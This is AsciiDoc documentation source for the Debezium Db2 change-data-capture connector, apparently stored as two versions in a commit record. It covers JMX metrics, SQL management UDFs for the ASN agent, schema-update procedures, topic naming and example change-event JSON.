\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-db2-connector-performance\n\/\/ Title: Monitoring {prodname} Db2 connector performance\n[[db2-monitoring]]\n== Monitoring\n\nThe {prodname} Db2 connector provides three types of metrics, in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-db2-connector}#db2-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-db2-connector}#db2-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n* {link-prefix}:{link-db2-connector}#db2-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details about how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-db2-databases\n\/\/ Title: Monitoring {prodname} during snapshots of Db2 databases\n[[db2-monitoring-snapshots]]\n[[db2-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Db2 connector record streaming\n[[db2-monitoring-streaming]]\n[[db2-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-schema-history\n\/\/ Title: Monitoring {prodname} Db2 connector schema history\n[[db2-monitoring-schema-history]]\n[[db2-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n
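\nAs an illustration of how you might read these metrics programmatically, the following Java sketch connects to a Kafka Connect worker over JMX and reads one attribute of the snapshot metrics MBean. The JMX service URL and port, the logical server name `mydatabase`, and the assumption that remote JMX is enabled on the worker are all hypothetical; the MBean name follows the pattern documented above:\n\n[source,java,indent=0]\n----\nimport javax.management.MBeanServerConnection;\nimport javax.management.ObjectName;\nimport javax.management.remote.JMXConnector;\nimport javax.management.remote.JMXConnectorFactory;\nimport javax.management.remote.JMXServiceURL;\n\npublic class SnapshotMetricsProbe {\n    public static void main(String[] args) throws Exception {\n        \/\/ Hypothetical JMX endpoint; adjust the host and port to match your Kafka Connect worker.\n        JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:\/\/\/jndi\/rmi:\/\/localhost:9999\/jmxrmi");\n        try (JMXConnector jmx = JMXConnectorFactory.connect(url)) {\n            MBeanServerConnection mbeans = jmx.getMBeanServerConnection();\n            \/\/ Snapshot metrics MBean, following the documented name pattern, for server=mydatabase.\n            ObjectName snapshotMetrics = new ObjectName("debezium.db2:type=connector-metrics,context=snapshot,server=mydatabase");\n            \/\/ SnapshotCompleted is one of the standard snapshot metric attributes.\n            Object completed = mbeans.getAttribute(snapshotMetrics, "SnapshotCompleted");\n            System.out.println("SnapshotCompleted = " + completed);\n        }\n    }\n}\n----\n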
\n\/\/ Type: reference\n\/\/ ModuleID: managing-debezium-db2-connectors\n\/\/ Title: Managing {prodname} Db2 connectors\n[[db2-management]]\n== Management\n\nAfter you deploy a {prodname} Db2 connector, use the {prodname} management UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs return a value; invoke those with the SQL `VALUES` statement. For other UDFs, use the SQL `CALL` statement. A combined example follows the table.\n\n.Descriptions of {prodname} management UDFs\n[cols="1,4",options="header"]\n|===\n|Task |Command and notes\n\n|[[debezium-db2-start-asn-agent]]<<debezium-db2-start-asn-agent,Start the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');`\n\n|[[debezium-db2-stop-asn-agent]]<<debezium-db2-stop-asn-agent,Stop the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('stop','asncdc');`\n\n|[[debezium-db2-check-asn-agent]]<<debezium-db2-check-asn-agent,Check the status of the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('status','asncdc');`\n\n|[[debezium-db2-put-capture-mode]]<<debezium-db2-put-capture-mode,Put a table into capture mode>>\n|`CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');` +\n +\nReplace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode.\n\n|[[debezium-db2-remove-capture-mode]]<<debezium-db2-remove-capture-mode,Remove a table from capture mode>>\n|`CALL ASNCDC.REMOVETABLE('MYSCHEMA', 'MYTABLE');`\n\n|[[debezium-db2-reinitialize-asn-service]]<<debezium-db2-reinitialize-asn-service,Reinitialize the ASN service>>\n|`VALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');` +\n +\nDo this after you put a table into capture mode or after you remove a table from capture mode.\n\n|===\n
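\nFor example, the following statements put a table into capture mode and then reinitialize the ASN service so that the change takes effect. `MYSCHEMA` and `MYTABLE` are placeholders, as in the preceding table:\n\n[source,sql,indent=0]\n----\n-- Put MYSCHEMA.MYTABLE into capture mode.\nCALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');\n\n-- Reinitialize the ASN service so that the new capture configuration takes effect.\nVALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');\n----\n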
\n\/\/ Type: assembly\n\/\/ ModuleID: updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors\n\/\/ Title: Updating schemas for Db2 tables in capture mode for {prodname} connectors\n[[db2-schema-evolution]]\n== Schema evolution\n\nWhile a {prodname} Db2 connector can capture schema changes, to update a schema, you must collaborate with a database administrator to ensure that the connector continues to produce change events. This is required by the way that Db2 implements replication.\n\nFor each table in capture mode, Db2's replication feature creates a change-data table that contains all changes to that source table. However, change-data table schemas are static. If you update the schema for a table in capture mode then you must also update the schema of its corresponding change-data table. A {prodname} Db2 connector cannot do this. A database administrator with elevated privileges must update schemas for tables that are in capture mode.\n\n[WARNING]\n====\nComplete a schema update procedure in full before you begin another schema update on the same table. To ensure that the schema update procedure runs only once, execute all of the DDL statements for a schema update in a single batch.\n====\n\nThere are generally two procedures for updating table schemas:\n\n* {link-prefix}:{link-db2-connector}#db2-offline-schema-update[Offline - executed while {prodname} is stopped]\n* {link-prefix}:{link-db2-connector}#db2-online-schema-update[Online - executed while {prodname} is running]\n\nEach approach has advantages and disadvantages.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-offline-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing offline schema updates for {prodname} Db2 connectors\n[[db2-offline-schema-update]]\n=== Offline schema update\n\nYou stop the {prodname} Db2 connector before you perform an offline schema update. While this is the safer schema update procedure, it might not be feasible for applications with high-availability requirements.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure\n\n. Suspend the application that updates the database.\n. Wait for the {prodname} connector to stream all unstreamed change event records.\n. Stop the {prodname} connector.\n. Apply all changes to the source table schema.\n. In the ASN register table, mark the tables with updated schemas as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Remove the source table with the old schema from capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-remove-capture-mode[running the {prodname} UDF for removing tables from capture mode].\n. Add the source table with the new schema to capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-put-capture-mode[running the {prodname} UDF for adding tables to capture mode].\n. In the ASN register table, mark the updated source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Resume the application that updates the database.\n. Restart the {prodname} connector.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-online-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing online schema updates for {prodname} Db2 connectors\n[[db2-online-schema-update]]\n[[db2-hot-schema-update]]\n=== Online schema update\n\nAn online schema update does not require application and data processing downtime. That is, you do not stop the {prodname} Db2 connector before you perform an online schema update. Also, an online schema update procedure is simpler than the procedure for an offline schema update.\n\nHowever, when a table is in capture mode, after a change to a column name, the Db2 replication feature continues to use the old column name. The new column name does not appear in {prodname} change events. You must restart the connector to see the new column name in change events.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure when adding a column to the end of a table\n\n. Lock the source tables whose schema you want to change.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Apply all changes to the schemas for the source tables.\n. Apply all changes to the schemas for the corresponding change-data tables.\n. In the ASN register table, mark the source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n\n.Procedure when adding a column to the middle of a table\n\n. Lock the source tables that you want to change.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. For each source table to be changed:\n.. Export the data in the source table.\n.. Truncate the source table.\n.. Alter the source table and add the column.\n.. Load the exported data into the altered source table.\n.. Export the data in the source table's corresponding change-data table.\n.. Truncate the change-data table.\n.. Alter the change-data table and add the column.\n.. Load the exported data into the altered change-data table.\n. In the ASN register table, mark the tables as `INACTIVE`.
This marks the old change-data tables as inactive, which preserves the data in them while ensuring that they are no longer updated.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id="debezium-connector-for-db2"]\n= {prodname} connector for Db2\n\n:context: db2\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n[NOTE]\n====\nThis connector is in an incubating state. Exact semantics, configuration options and other features may change in future revisions, based on the feedback we receive. Please let us know if you encounter any problems.\n====\nendif::community[]\n\n\nifdef::product[]\n[IMPORTANT]\n====\nThe {prodname} Db2 connector is a Technology Preview feature. Technology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete; therefore, Red Hat does not recommend implementing any Technology Preview features in production environments. This Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process. For more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\n\n{prodname}'s Db2 connector can capture row-level changes in the tables of a Db2 database. This connector is strongly inspired by the {prodname} implementation of SQL Server, which uses a SQL-based polling model that puts tables into "capture mode". When a table is in capture mode, the {prodname} Db2 connector generates and streams a change event for each row-level update to that table.\n\nA table that is in capture mode has an associated change-data table, which Db2 creates. For each change to a table that is in capture mode, Db2 adds data about that change to the table's associated change-data table. A change-data table contains an entry for each state of a row. It also has special entries for deletions. The {prodname} Db2 connector reads change events from change-data tables and emits the events to Kafka topics.\n\nThe first time a {prodname} Db2 connector connects to a Db2 database, the connector reads a consistent snapshot of the tables for which the connector is configured to capture changes. By default, this is all non-system tables. There are connector configuration properties that let you specify which tables to put into capture mode, or which tables to exclude from capture mode.\n\nWhen the snapshot is complete, the connector begins emitting change events for committed updates to tables that are in capture mode. By default, change events for a particular table go to a Kafka topic that has the same name as the table. Applications and services consume change events from these topics.\n\nThe connector uses the abstract syntax notation (ASN) libraries that come as a standard part of Db2 LUW (Db2 for Linux, UNIX and Windows) and which you can add to Db2 zOS. To use ASN and hence this connector, you must have a license for the IBM InfoSphere Data Replication (IIDR) product. However, IIDR does not need to be installed.\n\nThe Db2 connector has been tested with Db2\/Linux {linux-version}.
It is expected that the connector would also work on Windows, AIX, and zOS.\n\nifdef::product[]\nInformation and procedures for using a {prodname} Db2 connector are organized as follows:\n\n* xref:overview-of-debezium-db2-connector[]\n* xref:how-debezium-db2-connectors-work[]\n* xref:descriptions-of-debezium-db2-connector-data-change-events[]\n* xref:how-debezium-db2-connectors-map-data-types[]\n* xref:setting-up-db2-to-run-a-debezium-connector[]\n* xref:deploying-debezium-db2-connectors[]\n* xref:monitoring-debezium-db2-connector-performance[]\n* xref:managing-debezium-db2-connectors[]\n* xref:updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Db2 connector\n\/\/ ModuleID: overview-of-debezium-db2-connector\n[[db2-overview]]\n== Overview\n\nThe {prodname} Db2 connector is based on the link:https:\/\/www.ibm.com\/support\/pages\/q-replication-and-sql-replication-product-documentation-pdf-format-version-101-linux-unix-and-windows[ASN Capture\/Apply agents]\nthat enable SQL Replication in Db2. A capture agent:\n\n* Generates change-data tables for tables that are in capture mode.\n* Monitors tables in capture mode and stores change events for updates to those tables in their corresponding change-data tables.\n\nThe {prodname} connector uses a SQL interface to query change-data tables for change events.\n\nThe database administrator must put the tables for which you want to capture changes into capture mode. For convenience and for automating testing, there are {link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[{prodname} user-defined functions (UDFs)] in C that you can compile and then use to do the following management tasks:\n\n* Start, stop, and reinitialize the ASN agent\n* Put tables into capture mode\n* Create the replication (ASN) schemas and change-data tables\n* Remove tables from capture mode\n\nAlternatively, you can use Db2 control commands to accomplish these tasks.\n\nAfter the tables of interest are in capture mode, the connector reads their corresponding change-data tables to obtain change events for table updates. The connector emits a change event for each row-level insert, update, and delete operation to a Kafka topic that has the same name as the changed table. This is default behavior that you can modify. Client applications read the Kafka topics that correspond to the database tables of interest and can react to each row-level change event.\n\nTypically, the database administrator puts a table into capture mode in the middle of the life of a table. This means that the connector does not have the complete history of all changes that have been made to the table. Therefore, when the Db2 connector first connects to a particular Db2 database, it starts by performing a _consistent snapshot_ of each table that is in capture mode. After the connector completes the snapshot, the connector streams change events from the point at which the snapshot was made. In this way, the connector starts with a consistent view of the tables that are in capture mode, and does not drop any changes that were made while it was performing the snapshot.\n\n{prodname} connectors are tolerant of failures. As the connector reads and produces change events, it records the log sequence number (LSN) of the change-data table entry. The LSN is the position of the change event in the database log.
If the connector stops for any reason, including communication failures, network problems, or crashes, upon restarting it continues reading the change-data tables where it left off. This includes snapshots. That is, if the snapshot was not complete when the connector stopped, upon restart the connector begins a new snapshot.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-db2-connectors-work\n\/\/ Title: How {prodname} Db2 connectors work\n[[how-the-db2-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Db2 connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and handles schema changes.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-db2-connectors-perform-database-snapshots[]\n* xref:how-debezium-db2-connectors-read-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-db2-change-event-records[]\n* xref:about-the-debezium-db2-connector-schema-change-topic[]\n* xref:debezium-db2-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-db2-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} Db2 connectors perform database snapshots\n[[db2-snapshots]]\n=== Snapshots\n\nDb2's replication feature is not designed to store the complete history of database changes. Consequently, when a {prodname} Db2 connector connects to a database for the first time, it takes a consistent snapshot of tables that are in capture mode and streams this state to Kafka. This establishes the baseline for table content.\n\nBy default, when a Db2 connector performs a snapshot, it does the following:\n\n. Determines which tables are in capture mode, and thus must be included in the snapshot. By default, all non-system tables are in capture mode. Connector configuration properties, such as `table.exclude.list` and `table.include.list`, let you specify which tables should be in capture mode.\n. Obtains a lock on each of the tables in capture mode. This ensures that no schema changes can occur in those tables during the snapshot.\nThe level of the lock is determined by the `snapshot.isolation.mode` connector configuration property.\n. Reads the highest (most recent) LSN position in the server's transaction log.\n. Captures the schema of all tables that are in capture mode. The connector persists this information in its internal database history topic.\n. Optional. Releases the locks obtained in step 2. Typically, these locks are held for only a short time.\n. At the LSN position read in step 3, the connector scans the capture mode tables as well as their schemas. During the scan, the connector:\n.. Confirms that the table was created before the start of the snapshot. If it was not, the snapshot skips that table. After the snapshot is complete, and the connector starts emitting change events, the connector produces change events for any tables that were created during the snapshot.\n.. Produces a _read_ event for each row in each table that is in capture mode. All _read_ events contain the same LSN position, which is the LSN position that was obtained in step 3.\n.. Emits each _read_ event to the Kafka topic that has the same name as the table.\n. 
Records the successful completion of the snapshot in the connector offsets.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} Db2 connectors read change-data tables\n[id=\"how-debezium-db2-connectors-read-change-data-tables\"]\n=== Change-data tables\n\nAfter a complete snapshot, when a {prodname} Db2 connector starts for the first time, the connector identifies the change-data table for each source table that is in capture mode. The connector does the following for each change-data table:\n\n. Reads change events that were created between the last stored, highest LSN and the current, highest LSN.\n. Orders the change events according to the commit LSN and the change LSN for each event. This ensures that the connector emits the change events in the order in which the table changes occurred.\n. Passes commit and change LSNs as offsets to Kafka Connect.\n. Stores the highest LSN that the connector passed to Kafka Connect.\n\nAfter a restart, the connector resumes emitting change events from the offset (commit and change LSNs) where it left off. While the connector is running and emitting change events, if you remove a table from capture mode or add a table to capture mode, the connector detects this and modifies its behavior accordingly.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-db2-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Db2 change event records\n[[db2-topic-names]]\n=== Topic names\n\nBy default, the Db2 connector writes change events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topic has the following format:\n\n_databaseName_._schemaName_._tableName_\n\n_databaseName_:: The logical name of the connector as specified with the `database.server.name` connector configuration property.\n\n_schemaName_:: The name of the schema in which the operation occurred.\n\n_tableName_:: The name of the table in which the operation occurred.\n\nFor example, consider a Db2 installation with the `mydatabase` database, which contains four tables: `PRODUCTS`, `PRODUCTS_ON_HAND`, `CUSTOMERS`, and `ORDERS` that are in the `MYSCHEMA` schema. The connector would emit events to these four Kafka topics:\n\n* `mydatabase.MYSCHEMA.PRODUCTS`\n* `mydatabase.MYSCHEMA.PRODUCTS_ON_HAND`\n* `mydatabase.MYSCHEMA.CUSTOMERS`\n* `mydatabase.MYSCHEMA.ORDERS`\n\nTo configure a Db2 connector to emit change events to differently-named Kafka topics, see the documentation for the {link-prefix}:{link-topic-routing}#topic-routing[topic routing transformation].\n\n\/\/ Type: concept\n\/\/ Title: About the {prodname} Db2 connector schema change topic\n[id=\"about-the-debezium-db2-connector-schema-change-topic\"]\n=== Schema change topic\n\nFor a table that is in capture mode, the {prodname} Db2 connector stores the history of schema changes to that table in a database history topic. This topic reflects an internal connector state and you should not use it. If your application needs to track schema changes, there is a public schema change topic. 
The name of the schema change topic is the same as the logical server name specified in the connector configuration.\n\n[WARNING]\n====\nThe format of messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when:\n\n* A new table goes into capture mode.\n* A table is removed from capture mode.\n* During a {link-prefix}:{link-db2-connector}#db2-schema-evolution[database schema update], there is a change in the schema for a table that is in capture mode.\n\nA message to the schema change topic contains a logical representation of the table schema, for example:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"db2\",\n \"ts_ms\": 1588252618953,\n \"snapshot\": \"true\",\n \"db\": \"testdb\",\n \"schema\": \"DB2INST1\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"databaseName\": \"TESTDB\", \/\/ <1>\n \"schemaName\": \"DB2INST1\",\n \"ddl\": null, \/\/ <2>\n \"tableChanges\": [ \/\/ <3>\n {\n \"type\": \"CREATE\", \/\/ <4>\n \"id\": \"\\\"DB2INST1\\\".\\\"CUSTOMERS\\\"\", \/\/ <5>\n \"table\": { \/\/ <6>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <7>\n \"ID\"\n ],\n \"columns\": [ \/\/ <8>\n {\n \"name\": \"ID\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"FIRST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"LAST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"EMAIL\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,3,6\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|2\n|`ddl`\n|Always `null` for the Db2 connector. For other connectors, this field contains the DDL responsible for the schema change. This DDL is not available to Db2 connectors.\n\n|3\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|4\n|`type`\na|Describes the kind of change. 
The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table deleted\n\n|5\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|6\n|`table`\n|Represents table metadata after the applied change.\n\n|7\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|8\n|`columns`\n|Metadata for each column in the changed table.\n\n|===\n\nIn messages to the schema change topic, the key is the name of the database that contains the schema change. In the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs="+attributes"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"TESTDB\"\n }\n}\n----\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} Db2 connector-generated events that represent transaction boundaries\n[[db2-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich change data event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from the given data collection\n\n.Example\n\n[source,json,indent=0,subs="+attributes"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nThe connector emits transaction events to the `_database.server.name_.transaction` topic.\n\n.Data change event enrichment\n\nWhen transaction metadata is enabled, the connector enriches the change event `Envelope` with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs="+attributes"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Db2 connector data change events\n[[db2-events]]\n== Data change events\n\nThe {prodname} Db2 connector 
generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce them. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n }\n}\n----\n\n.Overview of change event basic content\n[cols="1,2,7",options="header"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-db2-connector}#db2-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-db2-connector}#db2-topic-names[topic names].\n\n[WARNING]\n====\nThe {prodname} Db2 connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_.
Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character, it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n\nAlso, Db2 names for databases, schemas, and tables can be case sensitive. This means that the connector could emit event records for more than one table to the same Kafka topic.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-db2-change-events[]\n* xref:about-values-in-debezium-db2-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-db2-change-events\n\/\/ Title: About keys in {prodname} Db2 change events\n[[db2-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"ID\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols="1,2,7",options="header"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is 